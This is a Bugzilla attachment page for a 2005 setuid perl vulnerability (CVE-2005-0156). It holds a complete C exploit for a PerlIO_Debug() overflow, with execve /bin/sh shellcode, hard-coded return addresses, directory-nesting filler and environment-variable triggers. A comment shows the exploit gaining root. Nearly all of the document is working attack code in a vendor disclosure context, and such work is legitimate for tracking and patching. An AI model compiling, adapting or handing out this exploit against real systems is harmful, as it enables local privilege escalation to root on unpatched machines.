Bugzilla – Attachment 28127 Details for
Bug 65354
VUL-0: CVE-2005-0156: 2 setuid perl problems
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
IDP Log In
|
Forgot Password
ex_perl2.c
ex_perl2.c (text/plain), 3.85 KB, created by
Marcus Meissner
on 2005-02-02 19:48:44 UTC
(
hide
)
Description:
ex_perl2.c
Filename:
MIME Type:
Creator:
Marcus Meissner
Created:
2005-02-02 19:48:44 UTC
Size:
3.85 KB
patch
obsolete
>/* > * Copyright Kevin Finisterre > * > * Setuid perl PerlIO_Debug() overflow > * > * cc -o ex_perl2 ex_perl2.c -std=c99 > * > * kfinisterre@jdam:~$ ./ex_perl2 > * Dirlen: 1052 > * sh-2.05b# id > * uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root) > */ > >#include <stdlib.h> >#include <stdio.h> >#include <strings.h> >#include <string.h> >#include <sys/stat.h> >#include <sys/types.h> >#include <unistd.h> > >int main(int *argc, char **argv) >{ > int len = 23; > int count = 5; > char malpath[10000]; > char tmp[256]; > char *filler; > char *ptr; > > unsigned char code[] = > /* > 0xff-less execve() /bin/sh by anathema <anathema@hack.co.za> > Linux/IA32 0xff-less execve() shellcode. > */ > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" > "\x89\xe6" /* movl %esp, %esi */ > "\x83\xc6\x30" /* addl $0x30, %esi */ > "\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */ > "\x40" /* incl %eax */ > "\x89\x06" /* movl %eax, (%esi) */ > "\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */ > "\x40" /* incl %eax */ > "\x89\x46\x04" /* movl %eax, 0x04(%esi) */ > "\x29\xc0" /* subl %eax, %eax */ > "\x88\x46\x07" /* movb %al, 0x07(%esi) */ > "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ > "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ > "\xb0\x0b" /* movb $0x0b, %al */ > "\x87\xf3" /* xchgl %esi, %ebx */ > "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ > "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ > "\xcd\x80" /* int $0x80 */; > > > chdir("/tmp/"); > > filler = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/"; > > for (int x=0; x<4; x=x+1) > { > mkdir(filler, 0777); > chdir(filler); > count = count + 256; > } > > memset(tmp,0x41,len); > count = count + len; > > ptr = tmp+len; > ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp > ptr = putLong (ptr, 0xbffffb6a); > ptr = putLong (ptr, 0xbffffb6a); > > strcat(tmp, "/"); > mkdir(tmp, 0777); > chdir(tmp); > > printf ("Dirlen: %d\n", count); > > FILE *perlsploit; > char perldummyfile[] = { > "#!/usr/bin/sperl5.8.4\n" > "# \n" > "# Be proud that perl(1) may proclaim: \n" > "# Setuid Perl scripts are safer than C programs ...\n" > "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n" > }; > > if(!(perlsploit = fopen("take_me.pl","w+"))) { > printf("error opening file\n"); > exit(1); > } > fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit); > fclose(perlsploit); > > getcwd(malpath, 10000); > strcat(malpath, "/"); > strcat(malpath, "take_me.pl"); >// printf("running: %s\n",malpath); > > chmod(malpath,0755); > setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1); > setenv("PERL5LIB", code, 1); > execv(malpath,(char *) NULL); > >} >/* > * put a address in mem, for little-endian > * > */ >char* >putLong (char* ptr, long value) >{ > *ptr++ = (char) (value >> 0) & 0xff; > *ptr++ = (char) (value >> 8) & 0xff; > *ptr++ = (char) (value >> 16) & 0xff; > *ptr++ = (char) (value >> 24) & 0xff; > > return ptr; >} > > > >
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=28127">View the attachment on a separate page</a>.</b>
Actions:
View
Attachments on
bug 65354
:
28090
|
28127
|
28387